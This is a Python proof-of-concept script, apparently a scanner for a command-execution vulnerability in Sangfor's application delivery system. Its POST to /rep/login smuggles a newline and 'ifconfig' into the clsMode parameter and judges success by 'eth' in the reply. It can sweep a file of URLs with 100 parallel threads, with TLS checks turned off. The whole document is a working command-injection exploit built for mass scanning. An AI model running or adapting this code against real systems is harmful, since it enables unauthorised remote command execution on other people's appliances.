import requests,sys,argparse,re,os,time
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test = """███████╗██╗  ██╗███████╗███╗   ██╗██╗  ██╗██╗███╗   ██╗███████╗██╗   ██╗
██╔════╝██║  ██║██╔════╝████╗  ██║╚██╗██╔╝██║████╗  ██║██╔════╝██║   ██║
███████╗███████║█████╗  ██╔██╗ ██║ ╚███╔╝ ██║██╔██╗ ██║█████╗  ██║   ██║
╚════██║██╔══██║██╔══╝  ██║╚██╗██║ ██╔██╗ ██║██║╚██╗██║██╔══╝  ██║   ██║
███████║██║  ██║███████╗██║ ╚████║██╔╝ ██╗██║██║ ╚████║██║     ╚██████╔╝
╚══════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚═╝      ╚═════╝ 
                                                                        

"""
    print(test)

def main():
    banner()
    parser = argparse.ArgumentParser(description='深信服应用交付系统命令执行漏洞')
    parser.add_argument('-u','--url',dest='url',type=str,help='input your url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input your file')
    args = parser.parse_args()
    if args.url and not args.file:
        if poc(args.url):
            poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")


def poc(target):
    payload = '/rep/login'
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding':'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
        'Cookie': 'JSESSIONID=6F81F16A658FEAF2F7DDAFB93971DA7C.server',
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data='clsMode=cls_mode_login%0Aifconfig%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123'
    try:
        res=requests.post(url=target+payload,headers=headers,data=data,verify=False,timeout=6)
        if res.status_code==200 and 'eth' in res.text:
            print(f"[+]{target}    存在漏洞")
        else:
            print(f"[-]{target}    不存在漏洞")
    except:
         print(f"[-]{target}    请求出现异常")



if __name__ == '__main__':
    main()
